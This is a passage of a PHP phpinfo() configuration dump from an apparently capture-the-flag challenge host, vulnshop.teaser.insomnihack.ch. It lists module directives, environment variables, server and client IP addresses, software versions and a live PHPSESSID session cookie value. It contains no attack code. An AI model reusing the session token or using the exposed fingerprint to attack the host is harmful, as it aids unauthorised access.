374 | <tr><td class="e">Phar EXT version </td><td class="v">2.0.2 </td></tr>
375 | <tr><td class="e">Phar API version </td><td class="v">1.1.1 </td></tr>
376 | <tr><td class="e">SVN revision </td><td class="v">$Id: 9d91fd26ae99260111b934cc25174387d4bd7059 $ </td></tr>
377 | <tr><td class="e">Phar-based phar archives </td><td class="v">enabled </td></tr>
378 | <tr><td class="e">Tar-based phar archives </td><td class="v">enabled </td></tr>
379 | <tr><td class="e">ZIP-based phar archives </td><td class="v">enabled </td></tr>
380 | <tr><td class="e">gzip compression </td><td class="v">enabled </td></tr>
381 | <tr><td class="e">bzip2 compression </td><td class="v">disabled (install pecl/bz2) </td></tr>
382 | <tr><td class="e">Native OpenSSL support </td><td class="v">enabled </td></tr>
383 | </table>
384 | <table>
385 | <tr class="v"><td>
386 | Phar based on pear/PHP_Archive, original concept by Davey Shafik.<br />Phar fully realized by Gregory Beaver and Marcus Boerger.<br />Portions of tar implementation Copyright (c) 2003-2009 Tim Kientzle.</td></tr>
387 | </table>
388 | <table>
389 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
390 | <tr><td class="e">phar.cache_list</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
391 | <tr><td class="e">phar.readonly</td><td class="v">On</td><td class="v">On</td></tr>
392 | <tr><td class="e">phar.require_hash</td><td class="v">On</td><td class="v">On</td></tr>
393 | </table>
394 | <h2><a name="module_posix">posix</a></h2>
395 | <table>
396 | <tr><td class="e">Revision </td><td class="v">$Id: b691ca925e7a085e6929579c4eba8fed0732e0ef $ </td></tr>
397 | </table>
398 | <h2><a name="module_readline">readline</a></h2>
399 | <table>
400 | <tr class="h"><th>Readline Support</th><th>enabled</th></tr>
401 | <tr><td class="e">Readline library </td><td class="v">EditLine wrapper </td></tr>
402 | </table>
403 | <table>
404 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
405 | <tr><td class="e">cli.pager</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
406 | <tr><td class="e">cli.prompt</td><td class="v">\b&nbsp;\&gt;&nbsp;</td><td class="v">\b&nbsp;\&gt;&nbsp;</td></tr>
407 | </table>
408 | <h2><a name="module_reflection">Reflection</a></h2>
409 | <table>
410 | <tr class="h"><th>Reflection</th><th>enabled</th></tr>
411 | <tr><td class="e">Version </td><td class="v">$Id: e5303663dcb329e17818853ff223e5ee01481f2c $ </td></tr>
412 | </table>
413 | <h2><a name="module_session">session</a></h2>
414 | <table>
415 | <tr><td class="e">Session Support </td><td class="v">enabled </td></tr>
416 | <tr><td class="e">Registered save handlers </td><td class="v">files user  </td></tr>
417 | <tr><td class="e">Registered serializer handlers </td><td class="v">php_serialize php php_binary  </td></tr>
418 | </table>
419 | <table>
420 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
421 | <tr><td class="e">session.auto_start</td><td class="v">Off</td><td class="v">Off</td></tr>
422 | <tr><td class="e">session.cache_expire</td><td class="v">180</td><td class="v">180</td></tr>
423 | <tr><td class="e">session.cache_limiter</td><td class="v">nocache</td><td class="v">nocache</td></tr>
424 | <tr><td class="e">session.cookie_domain</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
425 | <tr><td class="e">session.cookie_httponly</td><td class="v">Off</td><td class="v">Off</td></tr>
426 | <tr><td class="e">session.cookie_lifetime</td><td class="v">0</td><td class="v">0</td></tr>
427 | <tr><td class="e">session.cookie_path</td><td class="v">/</td><td class="v">/</td></tr>
428 | <tr><td class="e">session.cookie_secure</td><td class="v">Off</td><td class="v">Off</td></tr>
429 | <tr><td class="e">session.entropy_file</td><td class="v">/dev/urandom</td><td class="v">/dev/urandom</td></tr>
430 | <tr><td class="e">session.entropy_length</td><td class="v">32</td><td class="v">32</td></tr>
431 | <tr><td class="e">session.gc_divisor</td><td class="v">1000</td><td class="v">1000</td></tr>
432 | <tr><td class="e">session.gc_maxlifetime</td><td class="v">1440</td><td class="v">1440</td></tr>
433 | <tr><td class="e">session.gc_probability</td><td class="v">0</td><td class="v">0</td></tr>
434 | <tr><td class="e">session.hash_bits_per_character</td><td class="v">5</td><td class="v">5</td></tr>
435 | <tr><td class="e">session.hash_function</td><td class="v">0</td><td class="v">0</td></tr>
436 | <tr><td class="e">session.lazy_write</td><td class="v">On</td><td class="v">On</td></tr>
437 | <tr><td class="e">session.name</td><td class="v">PHPSESSID</td><td class="v">PHPSESSID</td></tr>
438 | <tr><td class="e">session.referer_check</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
439 | <tr><td class="e">session.save_handler</td><td class="v">files</td><td class="v">files</td></tr>
440 | <tr><td class="e">session.save_path</td><td class="v">/var/lib/php/sessions</td><td class="v">/var/lib/php/sessions</td></tr>
441 | <tr><td class="e">session.serialize_handler</td><td class="v">php</td><td class="v">php</td></tr>
442 | <tr><td class="e">session.upload_progress.cleanup</td><td class="v">On</td><td class="v">On</td></tr>
443 | <tr><td class="e">session.upload_progress.enabled</td><td class="v">On</td><td class="v">On</td></tr>
444 | <tr><td class="e">session.upload_progress.freq</td><td class="v">1%</td><td class="v">1%</td></tr>
445 | <tr><td class="e">session.upload_progress.min_freq</td><td class="v">1</td><td class="v">1</td></tr>
446 | <tr><td class="e">session.upload_progress.name</td><td class="v">PHP_SESSION_UPLOAD_PROGRESS</td><td class="v">PHP_SESSION_UPLOAD_PROGRESS</td></tr>
447 | <tr><td class="e">session.upload_progress.prefix</td><td class="v">upload_progress_</td><td class="v">upload_progress_</td></tr>
448 | <tr><td class="e">session.use_cookies</td><td class="v">On</td><td class="v">On</td></tr>
449 | <tr><td class="e">session.use_only_cookies</td><td class="v">On</td><td class="v">On</td></tr>
450 | <tr><td class="e">session.use_strict_mode</td><td class="v">Off</td><td class="v">Off</td></tr>
451 | <tr><td class="e">session.use_trans_sid</td><td class="v">0</td><td class="v">0</td></tr>
452 | </table>
453 | <h2><a name="module_shmop">shmop</a></h2>
454 | <table>
455 | <tr><td class="e">shmop support </td><td class="v">enabled </td></tr>
456 | </table>
457 | <h2><a name="module_sockets">sockets</a></h2>
458 | <table>
459 | <tr><td class="e">Sockets Support </td><td class="v">enabled </td></tr>
460 | </table>
461 | <h2><a name="module_spl">SPL</a></h2>
462 | <table>
463 | <tr class="h"><th>SPL support</th><th>enabled</th></tr>
464 | <tr><td class="e">Interfaces </td><td class="v">Countable, OuterIterator, RecursiveIterator, SeekableIterator, SplObserver, SplSubject </td></tr>
465 | <tr><td class="e">Classes </td><td class="v">AppendIterator, ArrayIterator, ArrayObject, BadFunctionCallException, BadMethodCallException, CachingIterator, CallbackFilterIterator, DirectoryIterator, DomainException, EmptyIterator, FilesystemIterator, FilterIterator, GlobIterator, InfiniteIterator, InvalidArgumentException, IteratorIterator, LengthException, LimitIterator, LogicException, MultipleIterator, NoRewindIterator, OutOfBoundsException, OutOfRangeException, OverflowException, ParentIterator, RangeException, RecursiveArrayIterator, RecursiveCachingIterator, RecursiveCallbackFilterIterator, RecursiveDirectoryIterator, RecursiveFilterIterator, RecursiveIteratorIterator, RecursiveRegexIterator, RecursiveTreeIterator, RegexIterator, RuntimeException, SplDoublyLinkedList, SplFileInfo, SplFileObject, SplFixedArray, SplHeap, SplMinHeap, SplMaxHeap, SplObjectStorage, SplPriorityQueue, SplQueue, SplStack, SplTempFileObject, UnderflowException, UnexpectedValueException </td></tr>
466 | </table>
467 | <h2><a name="module_standard">standard</a></h2>
468 | <table>
469 | <tr><td class="e">Dynamic Library Support </td><td class="v">enabled </td></tr>
470 | <tr><td class="e">Path to sendmail </td><td class="v">/usr/sbin/sendmail -t -i  </td></tr>
471 | </table>
472 | <table>
473 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
474 | <tr><td class="e">assert.active</td><td class="v">1</td><td class="v">1</td></tr>
475 | <tr><td class="e">assert.bail</td><td class="v">0</td><td class="v">0</td></tr>
476 | <tr><td class="e">assert.callback</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
477 | <tr><td class="e">assert.exception</td><td class="v">0</td><td class="v">0</td></tr>
478 | <tr><td class="e">assert.quiet_eval</td><td class="v">0</td><td class="v">0</td></tr>
479 | <tr><td class="e">assert.warning</td><td class="v">1</td><td class="v">1</td></tr>
480 | <tr><td class="e">auto_detect_line_endings</td><td class="v">0</td><td class="v">0</td></tr>
481 | <tr><td class="e">default_socket_timeout</td><td class="v">60</td><td class="v">60</td></tr>
482 | <tr><td class="e">from</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
483 | <tr><td class="e">url_rewriter.tags</td><td class="v">a=href,area=href,frame=src,input=src,form=fakeentry</td><td class="v">a=href,area=href,frame=src,input=src,form=fakeentry</td></tr>
484 | <tr><td class="e">user_agent</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
485 | </table>
486 | <h2><a name="module_sysvmsg">sysvmsg</a></h2>
487 | <table>
488 | <tr><td class="e">sysvmsg support </td><td class="v">enabled </td></tr>
489 | <tr><td class="e">Revision </td><td class="v">$Id: dfb999763f95bfe9609fae60b4e07a492888ec7c $ </td></tr>
490 | </table>
491 | <h2><a name="module_sysvsem">sysvsem</a></h2>
492 | <table>
493 | <tr><td class="e">Version </td><td class="v">7.0.27-1+ubuntu16.04.1+deb.sury.org+1 </td></tr>
494 | </table>
495 | <h2><a name="module_sysvshm">sysvshm</a></h2>
496 | <table>
497 | <tr><td class="e">Version </td><td class="v">7.0.27-1+ubuntu16.04.1+deb.sury.org+1 </td></tr>
498 | </table>
499 | <h2><a name="module_tokenizer">tokenizer</a></h2>
500 | <table>
501 | <tr><td class="e">Tokenizer Support </td><td class="v">enabled </td></tr>
502 | </table>
503 | <h2><a name="module_zend+opcache">Zend OPcache</a></h2>
504 | <table>
505 | <tr><td class="e">Opcode Caching </td><td class="v">Up and Running </td></tr>
506 | <tr><td class="e">Optimization </td><td class="v">Enabled </td></tr>
507 | <tr><td class="e">SHM Cache </td><td class="v">Enabled </td></tr>
508 | <tr><td class="e">File Cache </td><td class="v">Disabled </td></tr>
509 | <tr><td class="e">Startup </td><td class="v">OK </td></tr>
510 | <tr><td class="e">Shared memory model </td><td class="v">mmap </td></tr>
511 | <tr><td class="e">Cache hits </td><td class="v">110024 </td></tr>
512 | <tr><td class="e">Cache misses </td><td class="v">3 </td></tr>
513 | <tr><td class="e">Used memory </td><td class="v">9138944 </td></tr>
514 | <tr><td class="e">Free memory </td><td class="v">57969920 </td></tr>
515 | <tr><td class="e">Wasted memory </td><td class="v">0 </td></tr>
516 | <tr><td class="e">Interned Strings Used memory </td><td class="v">141480 </td></tr>
517 | <tr><td class="e">Interned Strings Free memory </td><td class="v">4052824 </td></tr>
518 | <tr><td class="e">Cached scripts </td><td class="v">3 </td></tr>
519 | <tr><td class="e">Cached keys </td><td class="v">3 </td></tr>
520 | <tr><td class="e">Max keys </td><td class="v">3907 </td></tr>
521 | <tr><td class="e">OOM restarts </td><td class="v">0 </td></tr>
522 | <tr><td class="e">Hash keys restarts </td><td class="v">0 </td></tr>
523 | <tr><td class="e">Manual restarts </td><td class="v">0 </td></tr>
524 | </table>
525 | <table>
526 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
527 | <tr><td class="e">opcache.blacklist_filename</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
528 | <tr><td class="e">opcache.consistency_checks</td><td class="v">0</td><td class="v">0</td></tr>
529 | <tr><td class="e">opcache.dups_fix</td><td class="v">Off</td><td class="v">Off</td></tr>
530 | <tr><td class="e">opcache.enable</td><td class="v">On</td><td class="v">On</td></tr>
531 | <tr><td class="e">opcache.enable_cli</td><td class="v">Off</td><td class="v">Off</td></tr>
532 | <tr><td class="e">opcache.enable_file_override</td><td class="v">Off</td><td class="v">Off</td></tr>
533 | <tr><td class="e">opcache.error_log</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
534 | <tr><td class="e">opcache.fast_shutdown</td><td class="v">0</td><td class="v">0</td></tr>
535 | <tr><td class="e">opcache.file_cache</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
536 | <tr><td class="e">opcache.file_cache_consistency_checks</td><td class="v">1</td><td class="v">1</td></tr>
537 | <tr><td class="e">opcache.file_cache_only</td><td class="v">0</td><td class="v">0</td></tr>
538 | <tr><td class="e">opcache.file_update_protection</td><td class="v">2</td><td class="v">2</td></tr>
539 | <tr><td class="e">opcache.force_restart_timeout</td><td class="v">180</td><td class="v">180</td></tr>
540 | <tr><td class="e">opcache.huge_code_pages</td><td class="v">Off</td><td class="v">Off</td></tr>
541 | <tr><td class="e">opcache.inherited_hack</td><td class="v">On</td><td class="v">On</td></tr>
542 | <tr><td class="e">opcache.interned_strings_buffer</td><td class="v">4</td><td class="v">4</td></tr>
543 | <tr><td class="e">opcache.lockfile_path</td><td class="v">/tmp</td><td class="v">/tmp</td></tr>
544 | <tr><td class="e">opcache.log_verbosity_level</td><td class="v">1</td><td class="v">1</td></tr>
545 | <tr><td class="e">opcache.max_accelerated_files</td><td class="v">2000</td><td class="v">2000</td></tr>
546 | <tr><td class="e">opcache.max_file_size</td><td class="v">0</td><td class="v">0</td></tr>
547 | <tr><td class="e">opcache.max_wasted_percentage</td><td class="v">5</td><td class="v">5</td></tr>
548 | <tr><td class="e">opcache.memory_consumption</td><td class="v">64</td><td class="v">64</td></tr>
549 | <tr><td class="e">opcache.optimization_level</td><td class="v">0x7FFFBFFF</td><td class="v">0x7FFFBFFF</td></tr>
550 | <tr><td class="e">opcache.preferred_memory_model</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
551 | <tr><td class="e">opcache.protect_memory</td><td class="v">0</td><td class="v">0</td></tr>
552 | <tr><td class="e">opcache.restrict_api</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
553 | <tr><td class="e">opcache.revalidate_freq</td><td class="v">2</td><td class="v">2</td></tr>
554 | <tr><td class="e">opcache.revalidate_path</td><td class="v">Off</td><td class="v">Off</td></tr>
555 | <tr><td class="e">opcache.save_comments</td><td class="v">1</td><td class="v">1</td></tr>
556 | <tr><td class="e">opcache.use_cwd</td><td class="v">On</td><td class="v">On</td></tr>
557 | <tr><td class="e">opcache.validate_permission</td><td class="v">Off</td><td class="v">Off</td></tr>
558 | <tr><td class="e">opcache.validate_root</td><td class="v">Off</td><td class="v">Off</td></tr>
559 | <tr><td class="e">opcache.validate_timestamps</td><td class="v">On</td><td class="v">On</td></tr>
560 | </table>
561 | <h2><a name="module_zlib">zlib</a></h2>
562 | <table>
563 | <tr class="h"><th>ZLib Support</th><th>enabled</th></tr>
564 | <tr><td class="e">Stream Wrapper </td><td class="v">compress.zlib:// </td></tr>
565 | <tr><td class="e">Stream Filter </td><td class="v">zlib.inflate, zlib.deflate </td></tr>
566 | <tr><td class="e">Compiled Version </td><td class="v">1.2.8 </td></tr>
567 | <tr><td class="e">Linked Version </td><td class="v">1.2.8 </td></tr>
568 | </table>
569 | <table>
570 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
571 | <tr><td class="e">zlib.output_compression</td><td class="v">Off</td><td class="v">Off</td></tr>
572 | <tr><td class="e">zlib.output_compression_level</td><td class="v">-1</td><td class="v">-1</td></tr>
573 | <tr><td class="e">zlib.output_handler</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
574 | </table>
575 | <h2>Additional Modules</h2>
576 | <table>
577 | <tr class="h"><th>Module Name</th></tr>
578 | </table>
579 | <h2>Environment</h2>
580 | <table>
581 | <tr class="h"><th>Variable</th><th>Value</th></tr>
582 | <tr><td class="e">APACHE_RUN_DIR </td><td class="v">/var/run/apache2 </td></tr>
583 | <tr><td class="e">APACHE_PID_FILE </td><td class="v">/var/run/apache2/apache2.pid </td></tr>
584 | <tr><td class="e">PATH </td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin </td></tr>
585 | <tr><td class="e">APACHE_LOCK_DIR </td><td class="v">/var/lock/apache2 </td></tr>
586 | <tr><td class="e">LANG </td><td class="v">C </td></tr>
587 | <tr><td class="e">APACHE_RUN_USER </td><td class="v">www-data </td></tr>
588 | <tr><td class="e">APACHE_RUN_GROUP </td><td class="v">www-data </td></tr>
589 | <tr><td class="e">APACHE_LOG_DIR </td><td class="v">/var/log/apache2 </td></tr>
590 | <tr><td class="e">PWD </td><td class="v">/ </td></tr>
591 | </table>
592 | <h2>PHP Variables</h2>
593 | <table>
594 | <tr class="h"><th>Variable</th><th>Value</th></tr>
595 | <tr><td class="e">$_COOKIE['$Version']</td><td class="v">1</td></tr>
596 | <tr><td class="e">$_COOKIE['PHPSESSID']</td><td class="v">79f57mkl3eql3389n3ieef2pd3</td></tr>
597 | <tr><td class="e">$_COOKIE['$Path']</td><td class="v">/</td></tr>
598 | <tr><td class="e">$_SERVER['HTTP_REFERER']</td><td class="v">http://vulnshop.teaser.insomnihack.ch/</td></tr>
599 | <tr><td class="e">$_SERVER['HTTP_COOKIE']</td><td class="v">$Version=1; PHPSESSID=79f57mkl3eql3389n3ieef2pd3; $Path=/</td></tr>
600 | <tr><td class="e">$_SERVER['HTTP_CONNECTION']</td><td class="v">keep-alive</td></tr>
601 | <tr><td class="e">$_SERVER['HTTP_HOST']</td><td class="v">vulnshop.teaser.insomnihack.ch</td></tr>
602 | <tr><td class="e">$_SERVER['HTTP_USER_AGENT']</td><td class="v">Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)</td></tr>
603 | <tr><td class="e">$_SERVER['HTTP_ACCEPT']</td><td class="v">text/html,image/png,image/jpeg,image/pjpeg,image/x-xbitmap,image/svg+xml,image/gif;q=0.9,*/*;q=0.1</td></tr>
604 | <tr><td class="e">$_SERVER['HTTP_ACCEPT_LANGUAGE']</td><td class="v">en, *</td></tr>
605 | <tr><td class="e">$_SERVER['HTTP_ACCEPT_ENCODING']</td><td class="v">gzip, identity;q=0.9</td></tr>
606 | <tr><td class="e">$_SERVER['PATH']</td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</td></tr>
607 | <tr><td class="e">$_SERVER['SERVER_SIGNATURE']</td><td class="v">&lt;address&gt;Apache/2.4.18 (Ubuntu) Server at vulnshop.teaser.insomnihack.ch Port 80&lt;/address&gt;
608 | </td></tr>
609 | <tr><td class="e">$_SERVER['SERVER_SOFTWARE']</td><td class="v">Apache/2.4.18 (Ubuntu)</td></tr>
610 | <tr><td class="e">$_SERVER['SERVER_NAME']</td><td class="v">vulnshop.teaser.insomnihack.ch</td></tr>
611 | <tr><td class="e">$_SERVER['SERVER_ADDR']</td><td class="v">172.31.17.117</td></tr>
612 | <tr><td class="e">$_SERVER['SERVER_PORT']</td><td class="v">80</td></tr>
613 | <tr><td class="e">$_SERVER['REMOTE_ADDR']</td><td class="v">128.197.15.144</td></tr>
614 | <tr><td class="e">$_SERVER['DOCUMENT_ROOT']</td><td class="v">/var/www/html</td></tr>
615 | <tr><td class="e">$_SERVER['REQUEST_SCHEME']</td><td class="v">http</td></tr>
616 | <tr><td class="e">$_SERVER['CONTEXT_PREFIX']</td><td class="v"><i>no value</i></td></tr>
617 | <tr><td class="e">$_SERVER['CONTEXT_DOCUMENT_ROOT']</td><td class="v">/var/www/html</td></tr>
618 | <tr><td class="e">$_SERVER['SERVER_ADMIN']</td><td class="v">webmaster@localhost</td></tr>
619 | <tr><td class="e">$_SERVER['SCRIPT_FILENAME']</td><td class="v">/var/www/html/phpinfo.php</td></tr>
620 | <tr><td class="e">$_SERVER['REMOTE_PORT']</td><td class="v">52076</td></tr>
621 | <tr><td class="e">$_SERVER['GATEWAY_INTERFACE']</td><td class="v">CGI/1.1</td></tr>
622 | <tr><td class="e">$_SERVER['SERVER_PROTOCOL']</td><td class="v">HTTP/1.1</td></tr>
623 | <tr><td class="e">$_SERVER['REQUEST_METHOD']</td><td class="v">GET</td></tr>
624 | <tr><td class="e">$_SERVER['QUERY_STRING']</td><td class="v"><i>no value</i></td></tr>
625 | <tr><td class="e">$_SERVER['REQUEST_URI']</td><td class="v">/phpinfo.php</td></tr>
626 | <tr><td class="e">$_SERVER['SCRIPT_NAME']</td><td class="v">/phpinfo.php</td></tr>
627 | <tr><td class="e">$_SERVER['PHP_SELF']</td><td class="v">/phpinfo.php</td></tr>
628 | <tr><td class="e">$_SERVER['REQUEST_TIME_FLOAT']</td><td class="v">1516563702.986</td></tr>
629 | <tr><td class="e">$_SERVER['REQUEST_TIME']</td><td class="v">1516563702</td></tr>
630 | </table>
631 | <hr />
632 | <h1>PHP Credits</h1>
633 | <table>
634 | <tr class="h"><th>PHP Group</th></tr>
635 | <tr><td class="e">Thies C. Arntzen, Stig Bakken, Shane Caraveo, Andi Gutmans, Rasmus Lerdorf, Sam Ruby, Sascha Schumann, Zeev Suraski, Jim Winstead, Andrei Zmievski </td></tr>
636 | </table>
637 | <table>
638 | <tr class="h"><th>Language Design &amp; Concept</th></tr>
639 | <tr><td class="e">Andi Gutmans, Rasmus Lerdorf, Zeev Suraski, Marcus Boerger </td></tr>
640 | </table>
641 | <table>
642 | <tr class="h"><th colspan="2">PHP Authors</th></tr>
643 | <tr class="h"><th>Contribution</th><th>Authors</th></tr>
644 | <tr><td class="e">Zend Scripting Language Engine </td><td class="v">Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Marcus Boerger, Dmitry Stogov, Xinchen Hui, Nikita Popov </td></tr>
645 | <tr><td class="e">Extension Module API </td><td class="v">Andi Gutmans, Zeev Suraski, Andrei Zmievski </td></tr>
646 | <tr><td class="e">UNIX Build and Modularization </td><td class="v">Stig Bakken, Sascha Schumann, Jani Taskinen </td></tr>
647 | <tr><td class="e">Windows Support </td><td class="v">Shane Caraveo, Zeev Suraski, Wez Furlong, Pierre-Alain Joye, Anatol Belski, Kalle Sommer Nielsen </td></tr>
648 | <tr><td class="e">Server API (SAPI) Abstraction Layer </td><td class="v">Andi Gutmans, Shane Caraveo, Zeev Suraski </td></tr>
649 | <tr><td class="e">Streams Abstraction Layer </td><td class="v">Wez Furlong, Sara Golemon </td></tr>
650 | <tr><td class="e">PHP Data Objects Layer </td><td class="v">Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky </td></tr>
651 | <tr><td class="e">Output Handler </td><td class="v">Zeev Suraski, Thies C. Arntzen, Marcus Boerger, Michael Wallner </td></tr>
652 | <tr><td class="e">Consistent 64 bit support </td><td class="v">Anthony Ferrara, Anatol Belski </td></tr>
653 | </table>
654 | <table>
655 | <tr class="h"><th colspan="2">SAPI Modules</th></tr>
656 | <tr class="h"><th>Contribution</th><th>Authors</th></tr>
657 | <tr><td class="e">Apache 2.0 Handler </td><td class="v">Ian Holsman, Justin Erenkrantz (based on Apache 2.0 Filter code) </td></tr>
658 | <tr><td class="e">CGI / FastCGI </td><td class="v">Rasmus Lerdorf, Stig Bakken, Shane Caraveo, Dmitry Stogov </td></tr>
659 | <tr><td class="e">CLI </td><td class="v">Edin Kadribasic, Marcus Boerger, Johannes Schlueter, Moriyoshi Koizumi, Xinchen Hui </td></tr>
660 | <tr><td class="e">Embed </td><td class="v">Edin Kadribasic </td></tr>
661 | <tr><td class="e">FastCGI Process Manager </td><td class="v">Andrei Nigmatulin, dreamcat4, Antony Dovgal, Jerome Loyet </td></tr>
662 | <tr><td class="e">litespeed </td><td class="v">George Wang </td></tr>
663 | <tr><td class="e">phpdbg </td><td class="v">Felipe Pena, Joe Watkins, Bob Weinand </td></tr>
664 | </table>
665 | <table>
666 | <tr class="h"><th colspan="2">Module Authors</th></tr>
667 | <tr class="h"><th>Module</th><th>Authors</th></tr>
668 | <tr><td class="e">BC Math </td><td class="v">Andi Gutmans </td></tr>
669 | <tr><td class="e">Bzip2 </td><td class="v">Sterling Hughes </td></tr>
670 | <tr><td class="e">Calendar </td><td class="v">Shane Caraveo, Colin Viebrock, Hartmut Holzgraefe, Wez Furlong </td></tr>
671 | <tr><td class="e">COM and .Net </td><td class="v">Wez Furlong </td></tr>
672 | <tr><td class="e">ctype </td><td class="v">Hartmut Holzgraefe </td></tr>
673 | <tr><td class="e">cURL </td><td class="v">Sterling Hughes </td></tr>
674 | <tr><td class="e">Date/Time Support </td><td class="v">Derick Rethans </td></tr>
675 | <tr><td class="e">DBA </td><td class="v">Sascha Schumann, Marcus Boerger </td></tr>
676 | <tr><td class="e">DB-LIB (MS SQL, Sybase) </td><td class="v">Wez Furlong, Frank M. Kromann </td></tr>
677 | <tr><td class="e">DOM </td><td class="v">Christian Stocker, Rob Richards, Marcus Boerger </td></tr>
678 | <tr><td class="e">enchant </td><td class="v">Pierre-Alain Joye, Ilia Alshanetsky </td></tr>
679 | <tr><td class="e">EXIF </td><td class="v">Rasmus Lerdorf, Marcus Boerger </td></tr>
680 | <tr><td class="e">fileinfo </td><td class="v">Ilia Alshanetsky, Pierre Alain Joye, Scott MacVicar, Derick Rethans, Anatol Belski </td></tr>
681 | <tr><td class="e">Firebird driver for PDO </td><td class="v">Ard Biesheuvel </td></tr>
682 | <tr><td class="e">FTP </td><td class="v">Stefan Esser, Andrew Skalski </td></tr>
683 | <tr><td class="e">GD imaging </td><td class="v">Rasmus Lerdorf, Stig Bakken, Jim Winstead, Jouni Ahto, Ilia Alshanetsky, Pierre-Alain Joye, Marcus Boerger </td></tr>
684 | <tr><td class="e">GetText </td><td class="v">Alex Plotnick </td></tr>
685 | <tr><td class="e">GNU GMP support </td><td class="v">Stanislav Malyshev </td></tr>
686 | <tr><td class="e">Iconv </td><td class="v">Rui Hirokawa, Stig Bakken, Moriyoshi Koizumi  </td></tr>
687 | <tr><td class="e">IMAP </td><td class="v">Rex Logan, Mark Musone, Brian Wang, Kaj-Michael Lang, Antoni Pamies Olive, Rasmus Lerdorf, Andrew Skalski, Chuck Hagenbuch, Daniel R Kalowsky </td></tr>
688 | <tr><td class="e">Input Filter </td><td class="v">Rasmus Lerdorf, Derick Rethans, Pierre-Alain Joye, Ilia Alshanetsky </td></tr>
689 | <tr><td class="e">InterBase </td><td class="v">Jouni Ahto, Andrew Avdeev, Ard Biesheuvel </td></tr>
690 | <tr><td class="e">Internationalization </td><td class="v">Ed Batutis, Vladimir Iordanov, Dmitry Lakhtyuk, Stanislav Malyshev, Vadim Savchuk, Kirti Velankar </td></tr>
691 | <tr><td class="e">JSON </td><td class="v">Jakub Zelenka, Omar Kilani, Scott MacVicar </td></tr>
692 | <tr><td class="e">LDAP </td><td class="v">Amitay Isaacs, Eric Warnke, Rasmus Lerdorf, Gerrit Thomson, Stig Venaas </td></tr>
693 | <tr><td class="e">LIBXML </td><td class="v">Christian Stocker, Rob Richards, Marcus Boerger, Wez Furlong, Shane Caraveo </td></tr>
694 | <tr><td class="e">mcrypt </td><td class="v">Sascha Schumann, Derick Rethans </td></tr>
695 | <tr><td class="e">Multibyte String Functions </td><td class="v">Tsukada Takuya, Rui Hirokawa </td></tr>
696 | <tr><td class="e">MySQL driver for PDO </td><td class="v">George Schlossnagle, Wez Furlong, Ilia Alshanetsky, Johannes Schlueter </td></tr>
697 | <tr><td class="e">MySQLi </td><td class="v">Zak Greant, Georg Richter, Andrey Hristov, Ulf Wendel </td></tr>
698 | <tr><td class="e">MySQLnd </td><td class="v">Andrey Hristov, Ulf Wendel, Georg Richter, Johannes Schlüter </td></tr>
699 | <tr><td class="e">OCI8 </td><td class="v">Stig Bakken, Thies C. Arntzen, Andy Sautins, David Benson, Maxim Maletsky, Harald Radi, Antony Dovgal, Andi Gutmans, Wez Furlong, Christopher Jones, Oracle Corporation </td></tr>
700 | <tr><td class="e">ODBC driver for PDO </td><td class="v">Wez Furlong </td></tr>
701 | <tr><td class="e">ODBC </td><td class="v">Stig Bakken, Andreas Karajannis, Frank M. Kromann, Daniel R. Kalowsky </td></tr>
702 | <tr><td class="e">Opcache </td><td class="v">Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Dmitry Stogov, Xinchen Hui </td></tr>
703 | <tr><td class="e">OpenSSL </td><td class="v">Stig Venaas, Wez Furlong, Sascha Kettler, Scott MacVicar </td></tr>
704 | <tr><td class="e">Oracle (OCI) driver for PDO </td><td class="v">Wez Furlong </td></tr>
705 | <tr><td class="e">pcntl </td><td class="v">Jason Greene, Arnaud Le Blanc </td></tr>
706 | <tr><td class="e">Perl Compatible Regexps </td><td class="v">Andrei Zmievski </td></tr>
707 | <tr><td class="e">PHP Archive </td><td class="v">Gregory Beaver, Marcus Boerger </td></tr>
708 | <tr><td class="e">PHP Data Objects </td><td class="v">Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky </td></tr>
709 | <tr><td class="e">PHP hash </td><td class="v">Sara Golemon, Rasmus Lerdorf, Stefan Esser, Michael Wallner, Scott MacVicar </td></tr>
710 | <tr><td class="e">Posix </td><td class="v">Kristian Koehntopp </td></tr>
711 | <tr><td class="e">PostgreSQL driver for PDO </td><td class="v">Edin Kadribasic, Ilia Alshanetsky </td></tr>
712 | <tr><td class="e">PostgreSQL </td><td class="v">Jouni Ahto, Zeev Suraski, Yasuo Ohgaki, Chris Kings-Lynne </td></tr>
713 | <tr><td class="e">Pspell </td><td class="v">Vlad Krupin </td></tr>
714 | <tr><td class="e">Readline </td><td class="v">Thies C. Arntzen </td></tr>
715 | <tr><td class="e">Recode </td><td class="v">Kristian Koehntopp </td></tr>
716 | <tr><td class="e">Reflection </td><td class="v">Marcus Boerger, Timm Friebe, George Schlossnagle, Andrei Zmievski, Johannes Schlueter </td></tr>
717 | <tr><td class="e">Sessions </td><td class="v">Sascha Schumann, Andrei Zmievski </td></tr>
